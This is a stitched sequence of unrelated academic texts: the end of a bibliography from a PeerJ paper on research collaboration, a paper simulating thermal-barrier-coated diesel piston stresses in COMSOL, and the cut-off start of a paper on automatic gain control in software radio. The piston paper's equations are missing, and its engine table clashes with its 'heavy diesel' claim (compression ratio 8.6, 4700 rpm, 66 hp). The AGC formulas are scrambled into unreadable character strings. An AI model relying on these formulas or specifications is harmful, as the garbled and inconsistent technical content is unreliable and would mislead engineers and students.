C, Wang C, Wu H, Zhang L, He X. 2010. Music recommendation by unified hypergraph: combining social media information and music content. In: ACM international conference on multimedia. New York: ACM, 391–400. Corrêa Jr EA, Silva FN, Costa LDF, Amancio DR. 2017. Patterns of authors con- tribution in scientific manuscripts. Journal of Informetrics 11(2):498–510 DOI 10.1016/j.joi.2017.03.003. Dance A. 2012. Authorship: who’s on first? Nature 489(7417):591–593 DOI 10.1038/nj7417-591a. Egghe L. 2006. Theory and practise of the g-index. Scientometrics 69(1):131–152 DOI 10.1007/s11192-006-0144-7. Farhadi F, Sorkhi M, Hashemi S, Hamzeh A. 2011. An effective expert team formation in social networks based on skill grading. In: IEEE international conference on data mining workshops. Piscataway: IEEE, 366–372. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 19/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.182#supplemental-information http://dx.doi.org/10.7717/peerj-cs.182#supplemental-information http://dx.doi.org/10.7717/peerj-cs.182#supplemental-information http://dx.doi.org/10.1073/pnas.1706597114 https://blogs.plos.org/plos/2016/07/author-credit-plos-and-credit-update/ https://blogs.plos.org/plos/2016/07/author-credit-plos-and-credit-update/ http://dx.doi.org/10.1371/journal.pone.0084334 http://dx.doi.org/10.1007/s11192-005-0281-4 http://dx.doi.org/10.1016/j.joi.2017.03.003 http://dx.doi.org/10.1038/nj7417-591a http://dx.doi.org/10.1007/s11192-006-0144-7 http://dx.doi.org/10.7717/peerj-cs.182 Ferreira AA, Gonçalves MA, Laender AH. 2012. A brief survey of automatic meth- ods for author name disambiguation. ACM SIGMOD Record 41(2):15–26 DOI 10.1145/2350036.2350040. Gosset WS. 1908. The probable error of a mean. Biometrika 6(1):1–25 DOI 10.1093/biomet/6.1.1. Hirsch JE. 2005. An index to quantify an individual’s scientific research output. Proceedings of the National Academy of Sciences of the United States of America 102(46):16569–16572 DOI 10.1073/pnas.0507655102. Huang Y, Liu Q, Zhang S, Metaxas DN. 2010. Image retrieval via probabilistic hyper- graph ranking. In: Proceedings of computer vision and pattern recognition. Piscataway: IEEE, 3376–3383. Jones E, Oliphant T, Peterson P. 2001. SciPy: open source scientific tools for Python. Available at http://www.scipy.org/ (accessed on 11 November 2018). Kang IS, Na SH, Lee S, Jung H, Kim P, Sung WK, Lee JH. 2009. On co-authorship for author disambiguation. Information Processing & Management 45(1):84–97 DOI 10.1016/j.ipm.2008.06.006. Kong X, Jiang H, Wang W, Bekele TM, Xu Z, Wang M. 2017. Exploring dynamic research interest and academic influence for scientific collaborator recommendation. Scientometrics 113(1):369–385 DOI 10.1007/s11192-017-2485-9. Kong X, Jiang H, Yang Z, Xu Z, Feng X, Tolba A. 2016. Exploiting publication con- tents and collaboration networks for collaborator recommendation. PLOS ONE 11(2):e0148492 DOI 10.1371/journal.pone.0148492. Kong X, Mao M, Wang W, Liu J, Xu B. 2018. VOPRec: vector representation learning of papers with text information and structural identity for recommendation. IEEE Transactions on Emerging Topics in Computing Epub ahead of print Apr 26 2018 DOI 10.1109/TETC.2018.2830698. Lee I, Xia F, Roos G. 2017. An observation of research complexity in top universities based on research publications. In: International world wide web conference. New York: ACM, 1259–1265. Li L, Li T. 2013. News recommendation via hypergraph learning: encapsulation of user behavior and news content. In: Proceedings of the sixth ACM international conference on Web search and data mining. New York: ACM, 305–314. Li L, Tong H, Cao N, Ehrlich K, Lin Y-R, Buchler N. 2017. Enhancing team composition in professional networks: problem definitions and fast solutions. IEEE Transactions on Knowledge and Data Engineering 29(3):613–626 DOI 10.1109/TKDE.2016.2633464. Liang R, Jiang X. 2016. Scientific ranking over heterogeneous academic hypernetwork. In: Thirtieth AAAI conference on artificial intelligence. Menlo Park: AAAI, 20–26. Liu J, Dolan P. 2010. Personalized news recommendation based on click behavior. In: International conference on intelligent user interfaces. New York: ACM, 31–40. Liu Z, Huang H, Wei X, Mao X. 2014. Tri-Rank: an authority ranking framework in heterogeneous academic networks by mutual reinforce. In: Proceedings of 26th international conference on tools with artificial intelligence. Piscataway: IEEE, 493–500 DOI 10.1109/ICTAI.2014.80. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 20/22 https://peerj.com http://dx.doi.org/10.1145/2350036.2350040 http://dx.doi.org/10.1093/biomet/6.1.1 http://dx.doi.org/10.1073/pnas.0507655102 http://www.scipy.org/ http://dx.doi.org/10.1016/j.ipm.2008.06.006 http://dx.doi.org/10.1007/s11192-017-2485-9 http://dx.doi.org/10.1371/journal.pone.0148492 http://dx.doi.org/10.1109/TETC.2018.2830698 http://dx.doi.org/10.1109/TKDE.2016.2633464 http://dx.doi.org/10.1109/ICTAI.2014.80 http://dx.doi.org/10.7717/peerj-cs.182 Meng Q, Kennedy PJ. 2013. Discovering influential authors in heterogeneous academic networks by a co-ranking method. In: ACM international conference on conference on information & knowledge management. New York: ACM, 1029–1036. Milojević S. 2014. Principles of scientific research team formation and evolution. Proceedings of the National Academy of Sciences of the United States of America 111(11):3984–3989 DOI 10.1073/pnas.1309723111. Nicolini D, Mengis J, Swan J. 2012. Understanding the role of objects in cross- disciplinary collaboration. Organization Science 23(3):612–629 DOI 10.1287/orsc.1110.0664. Pan RK, Fortunato S. 2013. Author impact factor: tracking the dynamics of individual scientific impact. Scientific Reports 4:4880 DOI 10.1038/srep04880. Paul-Hus A, Mongeon P, Sainte-Marie M, Larivière V. 2017. The sum of it all: revealing collaboration patterns by combining authorship and acknowledgements. Journal of Informetrics 11(1):80–87 DOI 10.1016/j.joi.2016.11.005. Pearson K. 1895. Note on regression and inheritance in the case of two parents. Proceed- ings of the Royal Society B: Biological Sciences 58:240–242 DOI 10.1098/rspl.1895.0041. Persson RA. 2017. Bibliometric author evaluation through linear regression on the coau- thor network. Journal of Informetrics 11(1):299–306 DOI 10.1016/j.joi.2017.01.003. Rahman MT, Mac Regenstein J, Kassim NLA, Haque N. 2017. The need to quantify authors’ relative intellectual contributions in a multi-author paper. Journal of Informetrics 11(1):275–281 DOI 10.1016/j.joi.2017.01.002. Sauermann H, Haeussler C. 2017. Authorship and contribution disclosures. Science Advances 3(11):e1700404. Sawilowsky SS. 2012. S-Index: a comprehensive scholar impact index. International Review of Social Sciences & Humanities 3(1):85–95. Sekercioglu CH. 2008. Quantifying coauthor contributions. Science 322(5900):371 DOI 10.1126/science.322.5900.371a. Sinatra R, Wang D, Deville P, Song C, Barabási AL. 2016. Quantifying the evo- lution of individual scientific impact. Science 354(6312):aaf5239–aaf5239 DOI 10.1126/science.aaf5239. Suo Q, Sun S, Hajli N, Love PED. 2015. User ratings analysis in social networks through a hypernetwork method. Expert Systems with Applications 42(21):7317–7325 DOI 10.1016/j.eswa.2015.05.054. Theodoridis A, Kotropoulos C, Panagakis Y. 2013. Music recommendation using hypergraphs and group sparsity. In: Acoustics, speech and signal processing (ICASSP), 2013 IEEE international conference on. Piscataway: IEEE, 56–60. Wang W, Yu S, Bekele TM, Kong X, Xia F. 2017. Scientific collaboration patterns vary with scholars’ academic ages. Scientometrics 112(1):329–343 DOI 10.1007/s11192-017-2388-9. Wang X, Zhao Z, Ng W. 2016. USTF: a unified system of team formation. IEEE Transac- tions on Big Data 2(1):70–84 DOI 10.1109/TBDATA.2016.2546303. Xia F, Wang W, Bekele TM, Liu H. 2017. Big scholarly data: a survey. IEEE Transactions on Big Data 3(1):18–35 DOI 10.1109/TBDATA.2016.2641460. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 21/22 https://peerj.com http://dx.doi.org/10.1073/pnas.1309723111 http://dx.doi.org/10.1287/orsc.1110.0664 http://dx.doi.org/10.1038/srep04880 http://dx.doi.org/10.1016/j.joi.2016.11.005 http://dx.doi.org/10.1098/rspl.1895.0041 http://dx.doi.org/10.1016/j.joi.2017.01.003 http://dx.doi.org/10.1016/j.joi.2017.01.002 http://dx.doi.org/10.1126/science.322.5900.371a http://dx.doi.org/10.1126/science.aaf5239 http://dx.doi.org/10.1016/j.eswa.2015.05.054 http://dx.doi.org/10.1007/s11192-017-2388-9 http://dx.doi.org/10.1109/TBDATA.2016.2546303 http://dx.doi.org/10.1109/TBDATA.2016.2641460 http://dx.doi.org/10.7717/peerj-cs.182 Yao L, Sheng QZ, Ngu AH, Li X. 2016. Things of interest recommendation by leveraging heterogeneous relations in the internet of things. ACM Transactions on Internet Technology 16(2):Article 9. Yegros-Yegros A, Rafols I, D’Este P. 2015. Does interdisciplinary research lead to higher citation impact? The different effect of proximal and distal interdisciplinarity. PLOS ONE 10(8):e0135095 DOI 10.1371/journal.pone.0135095. Yu J, Tao D, Wang M. 2012. Adaptive hypergraph learning and its application in image classification. IEEE Transactions on Image Processing A Publication of the IEEE Signal Processing Society 21(7):3262–3272 DOI 10.1109/TIP.2012.2190083. Zhou W, Zhu Y, Javed F, Rahman M, Balaji J, Mcnair M. 2017. Quantifying skill relevance to job titles. In: IEEE international conference on big data. Piscataway: IEEE, 1532–1541. Kong et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.182 22/22 https://peerj.com http://dx.doi.org/10.1371/journal.pone.0135095 http://dx.doi.org/10.1109/TIP.2012.2190083 http://dx.doi.org/10.7717/peerj-cs.182 work_f4yz7eybbnfkfkp6xvojsv7npa ---- 096 Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head Nabeel Abdulhadi Ghyadh, Maher A.R. Sadiq Al-Baghdadi and Sahib Shihab Ahmed Department of Mechanical Engineering, Faculty of Engineering, University of Kufa, Ministry of Higher Education and Scientific Research, Iraq Email:sahib.aldulaimi@uokufa.edu.iq, nabeel.ghayadh@uokufa. edu.iq, mahirar.albaghdadi@uokufa.edu.iq Abstract. The main goal of this paper are equate behavior of the piston with and without different thermal coating layer on the piston head under thermal and mechanical loads that arise in the piston due to its operating. Three dimensional model of a piston heavy diesel engine has been presented. The governing equations have been discretized using a finite-volume method (FVM) and solved using multi- physics COMSOL package version 5. The results of the numerical model are showing the distribution of temperature, temperature gradients, Von-Mises stresses, and displacement in the diesel engine piston with and without 200 µm of thermal coating layer as (La2Zr 2O7) which have low thermal conductivity. The results show great improving in the performance of the piston with thermal coating layer. Keywords: Diesel engine piston, Thermal analysis, Thermal barrier coating, 3D finite volume method. 1. Introduction In the combustion chamber engines, some of the parts like cylinder head, cylinder liner, piston and valve are most thermal loaded parts because they are in direct contact with the flame due to this they losses their strength and slightly deform from its original state. So it becomes important to calculate the piston stress distribution in order to control the deformations within acceptable levels. The stress distribution enables the designer to optimize the thermal aspects of the piston design at lower cost. The mechanical stress and International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 097 thermal stress level depends on the distribution of temperature in the parts, thermal expansion coefficient, young modulus of elasticity, thermal load, design of the parts and cooling conditions [1,2]. The diesel engine is undergoing continuous technological progression to become an adiabatic engine improvement in performance and durability of IC engine. A major breakthrough in diesel engine technology to make it adiabatic can be achieved by coating the various parts like the cylinder wall, combustion chamber, cylinder head, piston body, valves etc., with ceramic materials having very low thermal conductivity [1]. The coating material of the adiabatic engine must have a high temperature resistance, low thermal expansion coefficient, low friction characteristics, good thermal shock resistance, high strain tolerance, low sintering rate of the porous microstructure, lightweight and durability [3, 4]. The ceramic-coated piston has been widely used in the internal combustion engine, and the ceramic coating can be used as an insulating layer that reduces much of the heat loss of the internal combustion engine and obtains higher efficiency [5]. The application of Thermal barrier coatings on the diesel engine piston head reduces the heat loss to the engine cooling-jacket through the surfaces exposed to the heat transfer such as cylinder head, liner, piston crown and piston rings. It is important to calculate the piston temperature distribution in order to control the thermal stresses and deformations within acceptable levels [6]. In the past two decades, much attention has been paid to the study on ‘adiabatic’ or ‘low heat rejection’ engines. These studies have been commonly performed on Diesel engines [7]. Uzun et al. [8] studied an experimental investigation into the effects of ceramic coatings on the performance of a diesel engine and exhaust emissions. Ceramic coatings can eliminate visible smoke, inhibit the formation of NOx reduce CO and particulate emissions, and improve combustion efficiency. The performance of the diesel ceramic coating was tested on a hydraulic engine dynamometer. The coatings were being evaluated for their ability to control particulate emissions, for emissions in exhaust gases for smoke, horsepower, speed and fuel rate. CO and hydrocarbon levels were lower than baseline levels. Buyukkaya and Cerit [9] investigated thermal analyses on a conventional (uncoated) diesel piston, made of aluminum silicon alloy and steel, thermal analyses were performed on pistons, coated with MgO–ZrO2 material by means of using a commercial code, namely ANSYS. Those results of four different pistons were compared with each other. The effects of coatings on the thermal behaviors of the pistons were investigated.It has been shown that the maximum surface temperature of the coated piston with material which has low thermal conductivity was improved approximately 48% for the AlSi alloy and 35% for the steel. Bhagat and Jibhakate [10] described the stress distribution of the seizure on piston four stroke engine by using FEA. The finite element analysis was performed by using computer aided design (CAD) software. The main objective was to investigate and analyze the thermal stress distribution of piston at the real engine condition during combustion process. That paper describes the mesh optimization with using finite element analysis technique to predict the higher stress and critical region on the component. The optimization is carried out to reduce the stress concentration on the upper end of the piston i.e (piston head/crown and piston skirt and sleeve). With using computer aided design (CAD), Pro/ENGINEER software the structural model of a piston will be developed. Furthermore, the finite element analysis performed with using software ANSYS. Rakopoulos and Mavropoulos [11] used a piston model for the calculation of the temperature field and heat flow field under steady and transient engine operating conditions. Three-dimensional finite-element analyses were implemented for the representation of the complex geometry metal components and found a satisfactory degree of agreement between theoretical predictions and experimental measurements. Muhammet Cerit [12] determined the temperature and the stress distributions in a partial ceramic coated Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 098 spark ignition (SI) engine piston. Effects of coating thickness and width on temperature and stress distributions were investigated including comparisons with results from an uncoated piston. It was observed that the coating surface temperature increase with increasing the thickness in a decreasing rate. Surface temperature of the piston with 0.4 mm coating thickness was increased up to 82 ° C. The normal stress on the coated surface decreases with coating thickness, up to approximately 1 mm for which the value of stress was the minimum. However, it rises when coating thickness exceeds 1 mm. As for bond coat surface, increasing coating thickness, the normal stress decreases steadily and the maximum shear stress rises in a decreasing rate. The optimum coating thickness was found to be near 1 mm under the given conditions. Li [13] used a three-dimensional finite element model of an aluminum diesel engine piston to calculate operating temperatures. He showed that skirt contours played an important part in the reduction of scuffing and friction. Prasad et al. [14] used thermally insulating material, namely partially stabilized zirconia (PSZ), on the piston crown face and reported a 19% reduction in heat loss through the piston. Pierz [15] investigated the thermal barrier coating development for diesel engine aluminum piston he found that the resulting predicted temperatures and stresses on the piston, together with material strength information, the primary cause of coating failure is proposed to be low cycle fatigue resulting from localized yielding when the coating is hot and in compression. The main scope of this work is to reduce the mechanical and thermal stresses level depends on the distribution of temperature in the piston and to increase the life span of the coated pistons of the engine using a thermal barrier coating (TBC) technology. The best performance can be obtained by combining the chosen materials and its own properties combines to create better performance. 2. Numerical Model Three dimensional finite volume method (FVM) model of a diesel engine piston has been presented. The model accounts for mechanical and thermal loads that arise in the engine piston due to its operating. The geometry of the piston is shown in Figure 1. The piston sits on the connecting road with crankshaft. Figure. 1 Geometry of the engine diesel piston. 099 2.1 Computational domain A computational model of an entire diesel engine piston would require very large computing resources and excessively long simulation times. The computational domain in this study is therefore limited to a sector from the cylindrical geometry of the piston. The three dimensional computational domain of the diesel engine piston used in the model is shown in Figure 2. Figure. 2. Three dimensional computational domain of the diesel engine piston. 2.2 Modelling equations The prediction of the temperature distribution in the diesel engine piston, involves the solution of the heat transfer equation; heat conduction and heat convection with the appropriate boundary conditions. The heat transfer in the diesel engine piston is governed by [16]; (1) Where is the density [kg/m3], cp is the heat capacity [kJ/kg.K], k is the thermal conductivity [W/m.K], u is the velocity vector [m/s], and Q is the heat source [W]. The diesel engine piston is subjected to the pressure force of the hot gases as shown in Figures 3 and 4. The heat transfer coefficient at the diesel engine piston head is calculated using the following equation [17]; (2) Where hg is the heat transfer coefficient [W/m2.K], Pg is the gas pressure [Pa], Tg is the gas temperature [K], Vp is the mean piston speed [m/s], b is the piston bore [mm], and is the crank shaft angle [degree]. Because of high variation of the temperature and pressure inside the combustion chamber during the engine cycle, the resulting gas temperature (Tgr) and mean heat transfer coefficient (hgm) can be Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 100 calculated as [17]; (3) (4) (5) Mechanical and thermal stresses will be analysed with the following equations [16]; (8) The thermal strains resulting from a change in temperature of an unconstrained isotropic volume are given by [16]; (9) Where is the thermal expansion [1/K], and Tref is the valve reference temperature. The analysis was performed under the worst thermal loading condition of rated power. The engine specification and operating condition are summarized in Table 1. Table 1 Engine specifications and operating conditions Component Value Piston bore [mm] 87.3 Connecting rod [mm] 130 Cylinder number 4 Int. valve number. 4 Exh. valve number 4 Compression ratio 8.6 Valve lift [mm] 9.5 Engine speed [rpm] 4700 Air fuel ratio 12 Power [hp] 66 Piston stroke [mm] 66.7 Mean piston speed [m/s] 10.4 101 Figure. 3 Diagram of measured gas pressure in the cylinder. Figure. 4 Diagram of measured gas temperature in the cylinder. 2.3. Computational procedure The governing equations were discretized using a finite-volume method and solved using multi-physics COMSOL package Version 5. Stringent numerical tests were performed to ensure that the solutions were independent of the grid size. A computational quadratic mesh consisting of a total of 359378 domain elements, 52230 boundary elements, and 5686 edge elements was found to provide sufficient spatial resolution (Figure 5). In addition to the heat transfer boundary conditions, the mechanical boundary conditions were applied as shown in Table 2. The coupled set of equations was solved iteratively, and the solution was considered to be convergent when the relative error was less than 1.0×10-6 in each field between two consecutive iterations. Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 102 Figure. 5 Computational mesh of the computational domain. 103 Table 2 Boundary conditions Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 104 2.4. Comparing with real damage cases The results of the numerical model are showing the temperature gradients in the diesel engine piston. The maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. This leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of microcracks. At the worst conditions for the cooling of the piston such as distortion of the piston head, this stress causes radial cracks at the edge of the piston. In addition, microcracks lead to loss in material of the piston and consequently to its defects. Examples of damage of the diesel engine piston shows in Figure 6 with good similarity to the numerical model. 3. Effect of The Coated Layer on The Piston Performance In addition to revealing the detail of mechanical and thermal phenomena inside the engine piston, the comprehensive three-dimensional model can also be used to investigate the sensitivity of certain parameters on piston performance. The validated model is now ready for studying the effects of the coating of the top surface of the piston with different types of thermal barrier coatings material on the piston performance. The performance characteristics of the engine piston based on a certain parameter can be obtained by varying that parameter (material properties of the coated layer) while keeping all other parameters constant at base case conditions. Results obtained from these parametric studies will allow the identification of the critical parameters for piston performance as well as the sensitivity of the model to these parameters. The top surface of the piston head is coated with 200 µm thickness of various thermal barrier materials (Figure 7). Material properties of each coated layer are shown in Table 3. Table 3 Material properties of the coated layer on the top surface of the piston 105 Figure. 6 Visual comparison between the result of the numerical model and examples of the real damage pistons. Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 106 Figure. 7 Thermal barrier material coated layer on the top surface of the piston head. 4. Results Results obtained from the mechanical and thermal phenomena inside the engine piston analyses by the finite volume technique, the temperature and stress variations for the uncoated top surface of the piston and coated top surface of the piston by the ceramic material are discussed systematically. For thermal barrier coatings in an engine, heat conduction is generally more dominant than radiation; hence, the thermal conductivity of material is very important for estimating temperature distributions and heat flows. The temperature distribution of the piston without and with coating layer is shown in Figure 8. As expected, the high temperatures are observed at the crown center and bowl lip areas, since it is subjected to the heat flux circumferentially. The maximum temperature is at the center and the minimum is at the bottom of the crown bowl on the piston top surface. In the radial direction, the temperature decreases from the crown center to the bottom of the bowl, then it increases towards the bowl lips and finally decreases again at the edge of the crown surface. 107 Von-Mises stress distributions versus distance for uncoated and coated top piston surfaces are shown in Figure 9. In the coating case, the Von-Mises stress distributions decreases due to decreasing in the thermal conductivity of the ceramic material. Temperature gradients distribution for uncoated and coated pistons on the top piston surfaces are shown in Figure 10. The maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. This leads to develop and increase of the maximum thermal stress, and as a result, this stress causes radial cracks at the edge of the piston. By using coating layer on the top piston surfaces, the temperature gradients distribution has been decreased due to the low thermal conductivity of the ceramic material and this leads to reduce failure in the piston. Figure 11 shows displacement distribution of the standard piston and coated pistons. Ceramic coating material has a low heat transfer coefficient and this reduce the displacement in the piston. Figure. 8 Temperature distribution of the engine piston [oC] without (upper) and with (lower) coating layer on the top surface of the piston head. Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 108 Figure. 9 Von-Mises stress distribution of the engine piston [MPa] without (upper) and with (lower) coating layer on the top surface of the piston head. 109 Figure. 10 Temperature gradients distribution of the engine piston [K/mm] without (upper) and with (lower) coating layer on the top surface of the piston head. Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head 110 International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 Figure. 11 Displacement distribution of the engine piston [mm] without (upper) and with (lower) coating layer on the top surface of the piston head. 5. Conclusion The purpose of this work was to compare the behaviour of the piston without and with coating layer on the top of piston under thermal and mechanical loads. The obtained results shows that the thermal and mechanical stresses induced in piston with coating layer are less as compare to the piston without coating layer. The coating material has been applied successfully to the engine piston as the thermal barrier coating of a diesel engine prevents excessive heat loss during combustion. Through the analysis, it is concluded that the main factor influencing the piston intensity is the temperature, thus providing basis for the optimization design of the piston. The stress and the deformation of the piston are mainly determined 111 by the temperature, so it is necessary to decrease the piston temperature through structure improvement. The results of the numerical model are showing the temperature gradients in the diesel engine piston. The maximum values of the temperature gradients appear around the piston head and also occur in the rings grooves. This leads to develop and increase of the maximum thermal stress, and as a result, it contributes to the formation of micro cracks. It is important to calculate the piston temperature distribution in order to control the thermal stresses and deformations within acceptable levels. References [1] Subodh Kumar Sharma1, P. K. Saini and N. K. Samria. Thermo–Mechanical Analysis of AV1 Diesel Engine Piston using FEM . Journal of Advanced Engineering Research ISSN: 2393-8447 Volume 2, Issue 1, 2015, pp.23-28. [2] RR.Sekar and R. Kamo. Advanced adiabatic diesel engine for passenger cars. SAE Paper 840434. [3] Pawar, A., Jajoo, B., and Nandagoankar, M. Combustion Analysis and Performance of Low Heat Rejection Diesel Engine with Different Thermal insulation coating, SAE Technical Paper: 2004, 12. [4] Hui Dai, XinghuaZhong, Jiayan Li and et al. Surface & Coatings Technology, 2006, 2527 – 2533. [5] Bin Zhao. Thermal Stress Analysis of Ceramic-Coated Diesel Engine Pistons Based on the Wavelet Finite-Element Method. American Society of Civil Engineers, 2012. [6] K. Sridhar, R. Reji Kumar and M. Narasimha. Thermal barrier Analysis in Diesel. International Journal of Modern Engineering Research (IJMER), Vol.3, Issue.3, May-June. 2013 pp-1435-1441. [7] V. Gnanamoorthi and G. Devaradjane. The effect of thermal barrier coating material in CI engine using higher fraction ethanol diesel blend. Journal of Chemical and Pharmaceutical Research, 2015, 7(2):416- 422. [8] Abdullah Uzun , I˙smet C evik and Mustafa Akc,il. Effects of thermal barrier coating on a turbocharged diesel engine performance. Surface and Coatings Technology 116–119 (1999) 505–507. [9] Ekrem Buyukkaya and Muhammet Cerit. Thermal analysis of a ceramic coating diesel engine piston using 3-D finite element method. Surface & Coatings Technology 202 (2007) 398–402. [10] A. R. Bhagat and Y. M. Jibhakate . Thermal Analysis And Optimization Of I.C. Engine Piston Using finite Element Method. International Journal of Modern Engineering Research (IJMER), Vol.2, Issue.4, July-Aug 2012 pp-2919-2921. [11] C.D. Rakopoulos and G.C. Mavropoulos, Study of the Steady and Transient Temperature Field and Heat Flow in the Combustion Chamber Components of a Medium Speed Diesel Engine Using Finite Element Analyses, International Journal of Energy Research, 20(5), 1996, 437-464. [12] Muhammet Cerit. Thermo mechanical analysis of a partially ceramic coated piston used in an SI engine. Surface & Coatings Technology 205 (2011) 3499–3505. [13] C.H. Li, Thermoelastic behavior of an aluminium diesel engine piston, General Motors Research Labs, Warren, SAE paper 860163, 1986. [14] R. Prasad, N.K. Samria, Comput. Struct. 34 (5) (1990) 765. [15]. P.M. Pierz, (1993) Thermal barrier coating development for diesel engine aluminium pistons. [16] Maher A.R. Sadiq Al-Baghdadi. Applications of Computational Fluid Dynamics and Finite Element Methods in Engineering Education. International Energy and Environment Foundation 2015, ISBN:9781512122428. [17] Muhammet Cerit, Mehmet Coban. Temperature and thermal stress analyses of a ceramic-coated aluminum alloy piston used in a diesel engine. International Journal of Thermal Sciences 2014, 77, pp.11-18. Mechanical And Thermal Stresses Anylsis In Diesel Engine Poiston With And Without Different Thermal Coating Layer On Piston Head work_f5xxg7vqh5hp5elf56uvxcoqve ---- International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 92 Application of AGC Technology in Software Radio Wu Hejing East University of Heilongjiang 150086 e-mail: wuhejing15@163.com Abstract—The characteristics of software radio are flexibility, openness, scalability. The hardware platform of software radio should be a general platform. This paper discusses automatic gain control(AGC) technology in software radio receiver and introduces an AGC algorithm applicable for DSP implement. This algorithm is tested in matlab and simulation results are provided. Keywords-Software Radio; Characteristics; AGC; Matlab I. INTRODUCTION At present, software radio technology is widely used in wireless communication, its basic idea is to use hardware as the basic platform of wireless communication. The A/D sampling data of signals are processed by various algorithms, and various communication functions are realized by means of software. This paper discusses the automatic gain control (AGC) algorithm in software radio. The function of AGC is to automatically adjust the gain of the amplifier according to the strength of the input signal received. Keep the output signal basically unchanged when the input signal changes in strength. An efficient AGC scheme suitable for DSP operation is proposed, which has fast convergence and accurate steady-state response characteristics. Moreover, it is simple to implement and can satisfy the needs of software radio system very well. II. CHARACTERISTICS OF SOFTWARE RADIO (1) flexibility. Software radio can be achieved by adding software modules. It's easy to add new features. It can communicate with any other radio station and act as radio frequency relay of other radio stations. (2) openness. Software radio adopts a standardized and modular structure. Its hardware can be updated or expanded with the development of devices and technologies. (3) scalability. Software radio can be upgraded by loading new software. III. ARCHITECTURE OF SOFTWARE RADIO Software radio architecture is the concrete design structure torealize the concept of software radio. It includes hardware, software and interface protocol. The design content must take into account the current situation and long-term development of wireless communication technology. Really unifies each standard. The structure of ideal software radio is mainly composed of antenna, RF front end, broadband A/D-D/A soft converter, General and special digital signal processors and various software components. The antenna of software radio generally covers a wide frequency band. For example, 1MHZ-2GHZ requires that the characteristics of each frequency band be uniform. To meet the needs of various businesses. The RF front-end mainly completes the tasks of up-conversion, filtering, power amplification and so on. Receiving realizes filtering, amplification, down conversion, and other functions. After digitizing the analog signal, the processing task is completely completed by the DSP software. In order to reduce the processing pressure of general AGC, A/D converter is usually used to transmit digital signals. After special digital signal processing devices, Reducing data flow rate, After the signal is changed to baseband, the data is controlled. DOI: 10.21307/ijanmc-2019-027 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 93 IV. SOFTWARE AND HARDWARE PLATFORM OF SOFTWARE RADIO The hardware platform of software radio should be a general platform. It may not have the highest efficiency for a particular communication system. But its openness and scalability enable it to adapt to a variety of wireless communication systems. And it can be flexible to add, subtract and modify. First, The hardware structure of software radio designed by people is basically a streaming structure. This structure is similar to the logical structure of wireless communication system. So its efficiency is higher. However, Because the direct coupling of each module in this structure is too close, There is a problem of pulling the trigger and moving the whole situation. Based on this situation, Bus architecture has been proposed. The bus structure has good openness. It is an ideal choice to realize software radio. There are many bus standards for industrial control bus. For example, ISA, PCI, EISA, VEM and so on. ISA bus and VME bus are widely used in current digital signal processing and industrial control. VEM bus has more advantages than ISA bus. The data of ISA bus is 16 bits. The address bus is 24 bits. Address space 16MB. Its bus bandwidth is only a few MHz. The data width of VME bus is 32 bits. There are 32 address lines. The address space is 4GB. The bus bandwidth is tens of MHz. VEM bus is designed for multi-processor system. The ISA bus is a single processor bus. So VME bus is often used in software radio. Software radio operates in the so-called "software bus" mode. Its software structure consists of software modules with standard interfaces. Each software module defines different application functions. The integrated operation can be achieved by inserting the bus. Realize the complete communication function. The integrated operation mode of "Software Bus" requires the unification of software interface standards. Improve software openness and reusability. Realize online software sharing in multiple environments. Applications based on JAVA technology can work on various platform systems. JAVA only needs to be written once. It can run anywhere. It is easy to implement function expansion and module embedding. It can realize the rapid opening of new business. JAVA plays an important role in realizing software reusability. V. PRINCIPLE OF AUTOMATIC GAIN CONTROL BY SOFTWARE The block diagram of the principle of automatic gain control is shown in Figure 1.The IF sampling signal x(n) is amplified by a controllable gain amplifier. The gain is A (n).The output signal y(n)= A(n)x(n),Calculate the logarithmic value of the level of signal y(n).Compared with reference level log(R),An error level e(n) is generated. The gain of the amplifier is continuously adjusted by negative feedback with e(n).The output log (y (n) is gradually approached to the reference level log (R) until the circuit reaches equilibrium. The parameter alpha controls the adjustment time of AGC circuit, which is a constant related to time. The logarithmic and exponential operation of signal level in circuit is to make the constant of adjusting time of control circuit independent of input level. The mathematical analysis of the block diagram is as follows: Figure 1. AGC algorithm implementation principle1 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 94 The recurrence formula of magnification factor is as follows: aRnxanAnxnARanAnA  ])(1)[(])()([)()1( When the amplitude after passing through the IF amplifier is less than R, )()( nxnAR  as positive, The amplification factor increases. )(ny increases, Similarly, when the magnitude is greater than R, )()( nxnAR  as negative. The magnification decreases. )(ny reduce, thus small signal amplification can be realized. Large signal attenuation, the signal is controlled within a certain range. Suppose the input signal is )()( ncunx  aRacnAnA  ]1)[()1( )(])1(1[)( nuac c R nA n  The gain after reaching a fixed state is c R ，Time constant is ac 1 The schematic diagram of AGC's second scheme is as 